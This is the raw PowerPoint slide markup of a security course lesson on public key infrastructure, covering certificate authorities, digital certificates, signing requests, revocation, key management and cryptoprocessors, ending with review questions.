              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 3B - Public Key Infrastructure</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E18C96D-37E2-D188-59AE-7E14BF1CAACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Public Key Infrastructure (PKI) is the framework that helps to establish trust in the use of public key cryptography to sign and encrypt messages via digital certificates. A digital certificate is a public assertion of identity, validated by a certificate authority (CA).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As a security professional, you are very likely to have to install and maintain PKI certificate services for private networks. You may also need to obtain and manage certificates from third-party PKI providers. This topic will help you to explain the importance of using appropriate cryptographic solutions to implement PKI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certificate Authorities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Digital Certificates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Root of Trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certificate Signing Requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certificate Revocation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34163686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AC567-C2AA-1493-586C-FCC440875D02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Certificate Authorities</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 180">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA4E191-169A-980A-7960-BC898D7CAE6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2119746" y="2557463"/>
            <a:ext cx="8146472" cy="3635520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2671063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5550F-7529-A9F0-7E78-BD1F824D8CA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Digital Certificates</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 181">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9EEAF8C-E4EA-B2E1-B28C-D4521A0F1775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530436" y="2557463"/>
            <a:ext cx="2931747" cy="3614737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6067491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49C0-5713-3D4C-506E-06A62211A0B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Root of Trust</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 183">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA05E0E-74B9-3D9E-A9C8-9F0295DF91C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639291" y="2557463"/>
            <a:ext cx="6317673" cy="3614737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2211153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0A0B5-3DF4-D973-580D-BC7EC95D44DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Certificate Signing Requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 184">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27C71698-7254-48A2-1FD8-1FDA0CD441B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2951017" y="2557463"/>
            <a:ext cx="6982691" cy="3593955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13459046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6EFD4-4ED5-CEF5-A7CD-A51C0747204F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Subject Name Attributes</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 185">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23F567AF-093B-1173-1807-4565A7799186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1909320" y="2560638"/>
            <a:ext cx="3138453" cy="3736253"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 187">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF600FF5-EE7B-F0F4-71A7-BD7B755900E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6812178" y="2784764"/>
            <a:ext cx="4237730" cy="3085811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2864150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D094-5D54-623A-CB8C-D5CD7420EAA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Certificate Revocation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 190">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F5A780-C539-66A0-49AA-FA4025584818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4389521" y="2557463"/>
            <a:ext cx="3819297" cy="3712895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1061974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A974D-6603-ECFF-904D-01156BD711A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Key Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F34D8BF-33B3-3E04-1BC8-AD14F7EBB622}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249487"/>
            <a:ext cx="9905999" cy="4499656"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>Key management </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>refers to operational considerations for the various stages in a key’s lifecycle. A key’s lifecycle may involve the following stages:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Key Generation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>—creates an asymmetric key pair or symmetric secret key of the required strength, using the chosen cipher.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>—prevents unauthorized access to a private or secret key and protecting against loss or damage.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Revocation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>—prevents use of the key if it is compromised. If a key is revoked, any data that was encrypted using it should be re-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>encryted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> using a new key.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Expiration and Renewal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>—gives the certificate a “shelf-life” increasing security. Every certificate expires after a certain period. Certificates can be renewed with the same key pair or with a new key pair.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2160914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82B5F-5F9C-DCB0-8D2B-C55FC38E740A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Cryptoprocessors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> and Secure Enclaves</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{214D9E31-DE58-BA5D-810F-EDB905A0CD43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464458" y="2097087"/>
            <a:ext cx="6037942" cy="4608513"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>A key pair or secret key can be generated and stored in the file system on a desktop or server computer running a general purpose OS. This has a number of drawbacks, however:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>A cryptographic key needs to be generated using a random process. A key generation system with a high degree of disorder—or entropy—ensures that any value from the possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>keyspace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> has the same chance of being selected as any other. Unfortunately, computer hardware and software is extremely low entropy. Computers process instructions in an entirely deterministic way. A computer can use pseudo RNG (PRNG) software that is still deterministic, but able to approximate a high level of disorder. Better security is obtained by true random number generator (TRNG) hardware. This uses a source of entropy, such as noise or air movement, as a nondeterministic seed for generating the key value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>A key stored in the file system is only as secure as any other file. It could easily be compromised via the user credential or physical theft of the device. It is also difficult to ensure that key access is fully audited. Ideally, cryptographic storage is tamper evident. This means that it is known immediately when a private or secret key has been compromised and it can be revoked and any ciphertexts re-encrypted with a new key.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 191">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39B4CB83-FF24-49AF-79B2-825D085EDA62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6698994" y="2249488"/>
            <a:ext cx="4837625" cy="3541712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3100353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6E322-4648-0529-F757-5ECDB324CE3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Gap Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9DD4471-DFC4-2D67-0AEB-6EDFC4ED200F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1661300" y="1291772"/>
            <a:ext cx="6495729" cy="5505740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2912051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192">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E635E1D-E303-ED78-5A6F-E870D2DC4144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2643090" y="1355351"/>
            <a:ext cx="5695238" cy="3095238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3068098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670851-B813-05CC-7E0F-DD2C09CAF636}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Public Key Infrastructure</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB12A461-F253-CCEB-BB6D-A2DFEC4AC920}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1915886"/>
            <a:ext cx="9905999" cy="4455885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How does a subject go about obtaining a certificate from a CA?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What cryptographic information is stored in a digital certificate?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What extension field is used with a web server certificate to support the identification of the server by multiple specific subdomain labels?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What are the potential consequences if a company loses control of a private key?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You are advising a customer about encryption for data backup security and the key escrow services that you offer. How should you explain the risks of key escrow and potential mitigations?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What mechanism informs clients about suspended or revoked keys?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
